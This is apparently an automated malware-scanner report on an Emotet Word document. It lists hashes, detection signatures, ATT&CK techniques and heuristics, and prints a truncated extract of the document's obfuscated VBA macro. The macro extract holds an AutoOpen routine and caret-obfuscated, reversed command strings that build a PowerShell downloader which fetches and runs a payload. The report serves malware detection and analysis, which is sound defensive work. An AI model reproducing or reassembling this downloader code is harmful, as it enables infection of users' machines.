Emotet Office (OLE) malware analysis — malicious · 2c8caf4228011e63

MALICIOUS

Office (OLE)

107.6 KB Created: 2018-09-28 18:03:00 Authoring application: Microsoft Office Word First seen: 2018-11-05

MD5: a4ff87ff49a5115df581cd91f5f8f022 SHA-1: d4c4c6d5a5fff2f698a710fb0cc90d1874f1f27d SHA-256: 2c8caf4228011e630900fc67fab7c06df5fd1436469473c31ea57b31eda9abc4

202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The sample was identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6872637-0'. Static analysis revealed the presence of a VBA macro with an AutoOpen function, which is a common technique for Emotet. The macro contains a call to the Shell() function, indicating an attempt to execute a downloaded payload. The presence of the AutoOpen macro and the Shell() call strongly suggests a downloader functionality.

Heuristics 6

ClamAV: Doc.Downloader.Emotet-6872637-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6872637-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 45434 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	45434 bytes
SHA-256: `87e7e16d70175257a1f92c4d0ae8ce9e60d8c581b4374d7f524d19bedeb07db9`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "AoPHVidjYUvvRX" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim EnrrJ(2) EnrrJ(0) = InStrRev(BOwnzDZX + DriSClwPFqEHsrsf + jdrXTnO, vaVitI + BBjvuiBwujGMhsTNqviww + JQjIIwiB) + InStrRev(Emozqaw + qDNhWDZXtTDjvuVOmhbKr + sfOAUlFO, viNEjDHI + UruiFNhzOtWTujXZh + mwZCAK) EnrrJ(1) = InStrRev(UCUoaBl + HEzPuCZPtpXjipdvEDMX + trBfBJ, cRdzFrvA + RNGkTiavpfrwtALXkj + aHRMfuN) + InStrRev(PwFqO + XUbNTQWwBMqkchjjdBSf + pabwaFi, AQIVNJVu + hXQcMSYifWEoiqKaVvi + cmWMTWIG) Dim IAihjf(2) IAihjf(0) = InStrRev(snbqkW + dqAjPtYfBAsnYmooHnCbz + aQRjqSRE, uDjPX + iiuaUkEviQlbPZTMHv + biUfwjI) + InStr(hAwSlOF + fvjBTczzGwLwGUwzQnUmJfD + kSKNqa, waPshF + cZjtcSXGEsLVQAfGhv + XrEwsc) IAihjf(1) = InStrRev(ikkhGUi + znGlhEXEzrBGtELB + avzVKa, PwSqrhHc + nzancPhjdoBIjQqHPXdiipD + HVwQV) + InStr(azmSko + uFNnlaAIVSRJPvpWcLfX + SpsmaXb, oZcPokG + vDEFLCnuSzhPhhCHVpzrUZ + WKBlWw) + InStr(cjNiqzh + zCYrvVAwsuzfkfRitj + TFEVFFQ, UiUXC + wfkXFBiwhtLhwYSFlqrP + WmcdPIi) + InStrRev(lNvDiSan + LFoIlGEzskEPpqCohYLK + VjUom, Trjbi + XSElHFjwMuEYwAvwwP + QKhhlYG) Dim AhztH(1) AhztH(0) = InStrRev(tDwjoYw + bjOflBTiavBBXwSOni + JAoJo, pppzhtP + PjfOjSadhJrFhNcEfwaMN + GMDrWHj) + InStr(GwSbqZvf + nkHbUnVLmoUROwMmLBKWjGd + NFAvEQMA, iEAwwwJ + EfiLGtwdOYUqMYztPBCvOi + KFOZZUw) + InStrRev(iuuBIV + aPrrcwQPWfBjALlqOow + pHPkssHf, oOOqi + PKwRVhSNpWiUzbPzjjSXPz + cSlUDkR) + InStrRev(BdUZwXwC + zLMwRNWRwmiRnuIUTuDYn + hvnIUU, jOPUTfqN + BSLhRFchQGvmYkzjIcSDS + aaopdhDv) tMZrnjf (KeyString(KZwOdCwv + vbMqiT + 14 + 21 + 32 + uizYTA + LpMWPCnw) + rvwSz + jjLKWkD + KeyString(HTzmFwo + GjpAsnOV + 15 + 23 + 39 + PYbiNlm + lpEJad) + LbpzQ + CkZUpVmK + lntGHG + LQOUaCm + aHthmE) Dim ijmhbz(1) ijmhbz(0) = InStrRev(aaYvazzt + icjZtJszUXdvhXiPC + YjAcOk, JANYWwK + cRiwVQwvlsbOdSEzYQvf + KWQWFL) + InStrRev(vmkAVC + zSzEwWuuHuLkWnZKtjHq + NTrhdt, VTcfraQ + czQLdZwNvsXcZhkbfNR + cPDEGwzu) + InStrRev(fsJLk + jPwJLwdFJpoVjXjOW + QvziLKkQ, itdBQ + QaEAnKXDUIlWlszCL + SPpmoFb) + InStrRev(TnSzw + dlrHIqbifLIlCOYjpLAVA + LpwJYZ, VQUZi + KsJtTtGFjToGfcLjimflGl + jzDJzfB) End Sub Attribute VB_Name = "MHcfFkjZ" Function LbpzQ() Dim FEjSSu(1) FEjSSu(0) = InStrRev(fuizhiB + UYaNFAFDUoBvEOkvYU + QrCzWR, OwpNMpf + jNOZcazKuTzFFFKVDm + dtZCGhHO) + InStrRev(crHDtoR + LWGdItDKiJzjCjCXdRCj + dNdwMW, oSSWPRJ + BjamvpSMltohJQffaMu + MsjGO) + InStrRev(ObuBwJa + tjzkLvJbAwlKGbVaCG + vAfNm, MqzHjfuY + laiOSzzjuVozfcEjjiU + nHoXvfM) + InStrRev(JRjwpcB + DNZYrSPDqoMiRYLKMEEiS + NlSnbikT, IOQWifcV + azHBNRjKwfGNAEPOGbOAko + odYbMFtP) Dim OONGLZ(2) OONGLZ(0) = InStrRev(iPAwNn + GvttfHaQOPQWfZiAamspi + QNzqpS, iRYJTsL + kbuvDFXimmdNFQqVcaZz + zzWQLHPj) + InStrRev(DQUNP + GfwEULaCBpadNGGw + WfXui, SvdGk + SjkcoMIFZIstZCQIMjz + mKwHG) + InStrRev(qfsLiVd + QNZwlplQhVpjSKZqiNi + pSNAOYs, mwVaa + BMqYDuOlsTwmfLtITcHX + ripwNsjA) + InStrRev(ArdduDb + EwrbdOjRFUujLMZnwAj + CHqiPOPA, ntzGL + LRvZittSiiUVBzYVYb + qTdnK) OONGLZ(1) = InStr(GNDsp + SUwwozjlVhSszLbtOFGEX + GbQkC, BjEYb + XEHIGrMYXsRvCuYNlrEU + BOqTdR) + InStr(ZqAwvQrE + tslkBUoAOBjfqFdH + FJcVMuNU, jzBbjh + kwoRUwXQTFLNzojIOp + UssUf) + InStrRev(vIoQX + nopYouPwIjwtZCXYs + cSRFIX, waGBAv + AhMFwkkiVujltwOLWHiVW + LJqrnF) + InStrRev(XqjPd + ijmcNmDDPljviSmXYasjhp + WHWWkT, BitFmI + cBWKiFicFUHqzEnhUhsAQ + Qdvhl) knYBK = "d /V^:^ON/C" + """" + "^s^e^t ^b^Sn=^ ^" + " ^ ^ ^ ^ ^ " + " ^ ^ ^ ^ ^ ^ ^ }^}" + "^{^hc^t^ac^}^;^" + "k^a^er^b^;^H^W" Dim ZKsBJ(1) ZKsBJ(0) = InStrRev(CAPSi + HHqLzNAWBFlBUlqYj + NZFhb, fWzrP + DDOHDYnqYvqAficGCtQGRv + rfGuHNDQ) + InStrRev(RcSRXdh + lhAttptEnzwMwKpdndz + AoYElVmY, pGrmN + KzdkiFhUNoDzHosERpR + YRBnd) NtkPXmcT = "^z^$^ ^m^e^t^I^-^e^" + "k^ovn^I^;)^H^W" + "^z^$^ ^,^j" + "^a^w$(^e^l^iF^d^a^o^" + "lnw^o^D^.^p^BC^$^{^" + "yr^t^{)r^A^q^$" Dim ZYSzlM(2) ZYSzlM(0) = InStrRev(YWQIwUf + pntImsRcLMDPpMia + jqWVsSBZ, mzmoR + mzajJBfMSATENKIwWnt + rZ ... (truncated)

SHA-256: 87e7e16d70175257a1f92c4d0ae8ce9e60d8c581b4374d7f524d19bedeb07db9

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "AoPHVidjYUvvRX"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim EnrrJ(2)
EnrrJ(0) = InStrRev(BOwnzDZX + DriSClwPFqEHsrsf + jdrXTnO, vaVitI + BBjvuiBwujGMhsTNqviww + JQjIIwiB) + InStrRev(Emozqaw + qDNhWDZXtTDjvuVOmhbKr + sfOAUlFO, viNEjDHI + UruiFNhzOtWTujXZh + mwZCAK)
EnrrJ(1) = InStrRev(UCUoaBl + HEzPuCZPtpXjipdvEDMX + trBfBJ, cRdzFrvA + RNGkTiavpfrwtALXkj + aHRMfuN) + InStrRev(PwFqO + XUbNTQWwBMqkchjjdBSf + pabwaFi, AQIVNJVu + hXQcMSYifWEoiqKaVvi + cmWMTWIG)
   Dim IAihjf(2)
IAihjf(0) = InStrRev(snbqkW + dqAjPtYfBAsnYmooHnCbz + aQRjqSRE, uDjPX + iiuaUkEviQlbPZTMHv + biUfwjI) + InStr(hAwSlOF + fvjBTczzGwLwGUwzQnUmJfD + kSKNqa, waPshF + cZjtcSXGEsLVQAfGhv + XrEwsc)
IAihjf(1) = InStrRev(ikkhGUi + znGlhEXEzrBGtELB + avzVKa, PwSqrhHc + nzancPhjdoBIjQqHPXdiipD + HVwQV) + InStr(azmSko + uFNnlaAIVSRJPvpWcLfX + SpsmaXb, oZcPokG + vDEFLCnuSzhPhhCHVpzrUZ + WKBlWw) + InStr(cjNiqzh + zCYrvVAwsuzfkfRitj + TFEVFFQ, UiUXC + wfkXFBiwhtLhwYSFlqrP + WmcdPIi) + InStrRev(lNvDiSan + LFoIlGEzskEPpqCohYLK + VjUom, Trjbi + XSElHFjwMuEYwAvwwP + QKhhlYG)
   Dim AhztH(1)
AhztH(0) = InStrRev(tDwjoYw + bjOflBTiavBBXwSOni + JAoJo, pppzhtP + PjfOjSadhJrFhNcEfwaMN + GMDrWHj) + InStr(GwSbqZvf + nkHbUnVLmoUROwMmLBKWjGd + NFAvEQMA, iEAwwwJ + EfiLGtwdOYUqMYztPBCvOi + KFOZZUw) + InStrRev(iuuBIV + aPrrcwQPWfBjALlqOow + pHPkssHf, oOOqi + PKwRVhSNpWiUzbPzjjSXPz + cSlUDkR) + InStrRev(BdUZwXwC + zLMwRNWRwmiRnuIUTuDYn + hvnIUU, jOPUTfqN + BSLhRFchQGvmYkzjIcSDS + aaopdhDv)
tMZrnjf (KeyString(KZwOdCwv + vbMqiT + 14 + 21 + 32 + uizYTA + LpMWPCnw) + rvwSz + jjLKWkD + KeyString(HTzmFwo + GjpAsnOV + 15 + 23 + 39 + PYbiNlm + lpEJad) + LbpzQ + CkZUpVmK + lntGHG + LQOUaCm + aHthmE)
   Dim ijmhbz(1)
ijmhbz(0) = InStrRev(aaYvazzt + icjZtJszUXdvhXiPC + YjAcOk, JANYWwK + cRiwVQwvlsbOdSEzYQvf + KWQWFL) + InStrRev(vmkAVC + zSzEwWuuHuLkWnZKtjHq + NTrhdt, VTcfraQ + czQLdZwNvsXcZhkbfNR + cPDEGwzu) + InStrRev(fsJLk + jPwJLwdFJpoVjXjOW + QvziLKkQ, itdBQ + QaEAnKXDUIlWlszCL + SPpmoFb) + InStrRev(TnSzw + dlrHIqbifLIlCOYjpLAVA + LpwJYZ, VQUZi + KsJtTtGFjToGfcLjimflGl + jzDJzfB)
End Sub


Attribute VB_Name = "MHcfFkjZ"
Function LbpzQ()
Dim FEjSSu(1)
FEjSSu(0) = InStrRev(fuizhiB + UYaNFAFDUoBvEOkvYU + QrCzWR, OwpNMpf + jNOZcazKuTzFFFKVDm + dtZCGhHO) + InStrRev(crHDtoR + LWGdItDKiJzjCjCXdRCj + dNdwMW, oSSWPRJ + BjamvpSMltohJQffaMu + MsjGO) + InStrRev(ObuBwJa + tjzkLvJbAwlKGbVaCG + vAfNm, MqzHjfuY + laiOSzzjuVozfcEjjiU + nHoXvfM) + InStrRev(JRjwpcB + DNZYrSPDqoMiRYLKMEEiS + NlSnbikT, IOQWifcV + azHBNRjKwfGNAEPOGbOAko + odYbMFtP)
   Dim OONGLZ(2)
OONGLZ(0) = InStrRev(iPAwNn + GvttfHaQOPQWfZiAamspi + QNzqpS, iRYJTsL + kbuvDFXimmdNFQqVcaZz + zzWQLHPj) + InStrRev(DQUNP + GfwEULaCBpadNGGw + WfXui, SvdGk + SjkcoMIFZIstZCQIMjz + mKwHG) + InStrRev(qfsLiVd + QNZwlplQhVpjSKZqiNi + pSNAOYs, mwVaa + BMqYDuOlsTwmfLtITcHX + ripwNsjA) + InStrRev(ArdduDb + EwrbdOjRFUujLMZnwAj + CHqiPOPA, ntzGL + LRvZittSiiUVBzYVYb + qTdnK)
OONGLZ(1) = InStr(GNDsp + SUwwozjlVhSszLbtOFGEX + GbQkC, BjEYb + XEHIGrMYXsRvCuYNlrEU + BOqTdR) + InStr(ZqAwvQrE + tslkBUoAOBjfqFdH + FJcVMuNU, jzBbjh + kwoRUwXQTFLNzojIOp + UssUf) + InStrRev(vIoQX + nopYouPwIjwtZCXYs + cSRFIX, waGBAv + AhMFwkkiVujltwOLWHiVW + LJqrnF) + InStrRev(XqjPd + ijmcNmDDPljviSmXYasjhp + WHWWkT, BitFmI + cBWKiFicFUHqzEnhUhsAQ + Qdvhl)
knYBK = "d /V^:^ON/C" + """" + "^s^e^t ^b^Sn=^ ^" + " ^ ^ ^ ^ ^   " + " ^ ^ ^ ^ ^ ^ ^ }^}" + "^{^hc^t^ac^}^;^" + "k^a^er^b^;^H^W"
Dim ZKsBJ(1)
ZKsBJ(0) = InStrRev(CAPSi + HHqLzNAWBFlBUlqYj + NZFhb, fWzrP + DDOHDYnqYvqAficGCtQGRv + rfGuHNDQ) + InStrRev(RcSRXdh + lhAttptEnzwMwKpdndz + AoYElVmY, pGrmN + KzdkiFhUNoDzHosERpR + YRBnd)
NtkPXmcT = "^z^$^ ^m^e^t^I^-^e^" + "k^ovn^I^;)^H^W" + "^z^$^ ^,^j" + "^a^w$(^e^l^iF^d^a^o^" + "lnw^o^D^.^p^BC^$^{^" + "yr^t^{)r^A^q^$"
Dim ZYSzlM(2)
ZYSzlM(0) = InStrRev(YWQIwUf + pntImsRcLMDPpMia + jqWVsSBZ, mzmoR + mzajJBfMSATENKIwWnt + rZ
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.